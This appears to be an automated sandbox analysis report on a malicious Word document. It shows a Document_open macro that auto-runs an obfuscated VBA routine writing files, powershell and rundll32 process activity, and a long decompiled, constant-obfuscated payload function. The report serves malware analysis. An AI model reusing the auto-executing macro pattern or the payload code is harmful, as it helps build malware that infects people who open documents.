Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: EajdMLeD
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: qpOWEIHHA
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: yjNpyrf
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: SynsDAgHG
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: fUGQf
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: gglHam
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: reTrs
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: ukrnIFCE
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: syDRd
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: wuKBFvqI
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: VwnpBElhO
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: RvFOAEPH
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Mid
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Name
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Application
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: vitXEH
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: oUWfJGBeE
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: EJEApM
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: YzIkA
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CCnbXRBeA
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: oMcHDXEF
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: SOunIGkF
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: XsKjcKE
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: eWkHqVao
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: VfJHAA
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: zOBhOx
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: XjhOHEMDC
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Mid
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Len
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: waSbS
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: QrVtQr
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: MfgnKGWI
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: yUWxTlVAC
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: IYKcgC
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: ThHBBDu
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Create
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Rua2q5h93ydvt
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Ijq0g4n16u9apwecr
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: QEIFFM
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: rJqMZII
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: JHrNWdBsW
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: PGiog
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateObject
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: CreateTextFile
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: WriteLine
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: NSiRQzd
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: Close
Part of subcall function Dn5440l_hb7@Oi5oelv0_s4: txKQv

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Dn5440l_hb7	executed
11	End Sub

Reset < >

Analysis Process: powershell.exe PID: 2548 Parent PID: 2288 powershell.exeCOMMON

Executed Functions

Function 000007FF00272139, Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2108490323.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97d45e80506a38495c67a1c74ee702ba0ac86a1c50b52dff4d259186a84b0f7
Instruction ID: e90f16de65bb190d1f905e9247ba3374812af5652f9f3cfdc85e86819f5ba2ba
Opcode Fuzzy Hash: b97d45e80506a38495c67a1c74ee702ba0ac86a1c50b52dff4d259186a84b0f7
Instruction Fuzzy Hash: 97C18911A1EBD64FE75397745C666A03FF0AF17210B0A40E7D488CB0E3D95C9D8AC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002723C5, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2108490323.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9f454a97df70104353f768aeccc4a114eb42d466dfe7cea6bafbb7aa7c4e07
Instruction ID: 6faeb124af62084e32cf3510cd1bd709b6e2a839d2143fdad625b969d3cf5783
Opcode Fuzzy Hash: fb9f454a97df70104353f768aeccc4a114eb42d466dfe7cea6bafbb7aa7c4e07
Instruction Fuzzy Hash: 7B319F51A1EBC64FE793533858657B07FE0EF57210B4A00E7D488CB1A3D9485D99C3A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 960 Parent PID: 2848 rundll32.exeCOMMON

Executed Functions

Function 00242C63, Relevance: 54.9, Strings: 43, Instructions: 1125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00242C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
				_v576 = _v576 ^ 0x72872e3c;
				_v576 = _v576 >> 3;
				_v576 = _v576 >> 6;
				_v576 = _v576 ^ 0x00395cc8;
				_v356 = 0x9a14;
				_v356 = _v356 * 5;
				_v356 = _v356 / _t1365;
				_v356 = _v356 ^ 0x00000d15;
				_v364 = 0x97d4;
				_v364 = _v364 + 0xffff1281;
				_v364 = _v364 << 0xd;
				_v364 = _v364 ^ 0xf54ac276;
				_v568 = 0x9f15;
				_v568 = _v568 + 0xffff08f5;
				_v568 = _v568 * 0x54;
				_v568 = _v568 + 0x8411;
				_v568 = _v568 ^ 0xffe3bf59;
				_v372 = 0xb5ac;
				_v372 = _v372 | 0xef292143;
				_v372 = _v372 << 0xc;
				_v372 = _v372 ^ 0x9b5ed191;
				_v560 = 0xc079;
				_v560 = _v560 << 6;
				_v560 = _v560 | 0x75378a54;
				_v560 = _v560 + 0xffff0fb6;
				_v560 = _v560 ^ 0x7536a745;
				_v252 = 0xffdd;
				_v252 = _v252 ^ 0x94fd4b64;
				_v252 = _v252 ^ 0x94fd9346;
				_v344 = 0x2817;
				_v344 = _v344 + 0xffffb9ce;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0x07ffc707;
				_v544 = 0xc4c3;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0xf37ee84d;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x0079cb8a;
				_v244 = 0xbe83;
				_v244 = _v244 << 9;
				_v244 = _v244 ^ 0x017d70fa;
				_v552 = 0x87b1;
				_v552 = _v552 + 0xe2ec;
				_v552 = _v552 + 0xffff8757;
				_t1366 = 0x57;
				_v552 = _v552 / _t1366;
				_v552 = _v552 ^ 0x00000cf8;
				_v524 = 0x9ee8;
				_v524 = _v524 >> 0xc;
				_v524 = _v524 + 0xffffea20;
				_v524 = _v524 + 0x67c2;
				_v524 = _v524 ^ 0x0000257d;
				_v240 = 0x3e44;
				_t1367 = 0x4e;
				_v240 = _v240 * 0x26;
				_v240 = _v240 ^ 0x000944b9;
				_v184 = 0xb17e;
				_v184 = _v184 + 0xc83;
				_v184 = _v184 ^ 0x00008468;
				_v428 = 0x2247;
				_v428 = _v428 >> 6;
				_v428 = _v428 | 0xbf36a58a;
				_v428 = _v428 ^ 0xbf36942e;
				_v492 = 0xaf88;
				_v492 = _v492 | 0x489e17bf;
				_v492 = _v492 / _t1367;
				_t1368 = 0x59;
				_v492 = _v492 / _t1368;
				_v492 = _v492 ^ 0x00028cc4;
				_v236 = 0x579b;
				_v236 = _v236 | 0x958cbadb;
				_v236 = _v236 ^ 0x958cb114;
				_v528 = 0x596e;
				_t1369 = 0x25;
				_v528 = _v528 / _t1369;
				_v528 = _v528 + 0xffff0f20;
				_v528 = _v528 * 0x71;
				_v528 = _v528 ^ 0xff96cb88;
				_v384 = 0xdb4f;
				_v384 = _v384 / _t1340;
				_v384 = _v384 ^ 0x047c7efe;
				_v384 = _v384 ^ 0x047c6269;
				_v256 = 0x2cf1;
				_v256 = _v256 | 0x808b3cca;
				_v256 = _v256 ^ 0x808b1c76;
				_v300 = 0x3901;
				_t1370 = 0x6d;
				_v300 = _v300 * 0xa;
				_v300 = _v300 >> 6;
				_v300 = _v300 ^ 0x0000212b;
				_v368 = 0x796e;
				_v368 = _v368 * 0xc;
				_v368 = _v368 * 0x3e;
				_v368 = _v368 ^ 0x0160b691;
				_v444 = 0xa0b9;
				_v444 = _v444 | 0x9ca1dfa8;
				_v444 = _v444 / _t1370;
				_v444 = _v444 * 0x63;
				_v444 = _v444 ^ 0x8e437e2f;
				_v532 = 0x8c65;
				_v532 = _v532 * 0x56;
				_v532 = _v532 << 0xa;
				_v532 = _v532 * 0x21;
				_v532 = _v532 ^ 0x519e8d1f;
				_v556 = 0x4a7f;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xa5c2;
				_v556 = _v556 | 0xa1707f4f;
				_v556 = _v556 ^ 0xa5705fb9;
				_v436 = 0x3fda;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 + 0x1364;
				_v436 = _v436 ^ 0xe1573554;
				_v436 = _v436 ^ 0xe158f097;
				_v564 = 0x6043;
				_v564 = _v564 | 0xb689377f;
				_v564 = _v564 >> 8;
				_v564 = _v564 ^ 0x2a62422c;
				_v564 = _v564 ^ 0x2ad4e10a;
				_v328 = 0x5c6e;
				_v328 = _v328 ^ 0x42ae754b;
				_v328 = _v328 + 0xbaa3;
				_v328 = _v328 ^ 0x42aeef53;
				_v228 = 0xef63;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x00001997;
				_v336 = 0x5044;
				_v336 = _v336 >> 0xf;
				_v336 = _v336 + 0xffffb35b;
				_v336 = _v336 ^ 0xffffef5d;
				_v440 = 0x7004;
				_v440 = _v440 * 0x7e;
				_v440 = _v440 * 0x13;
				_v440 = _v440 << 0x10;
				_v440 = _v440 ^ 0x85685bd2;
				_v164 = 0x75ea;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x03af40f2;
				_v224 = 0xc6cf;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x018dae64;
				_v160 = 0xb450;
				_t1371 = 0x38;
				_v160 = _v160 / _t1371;
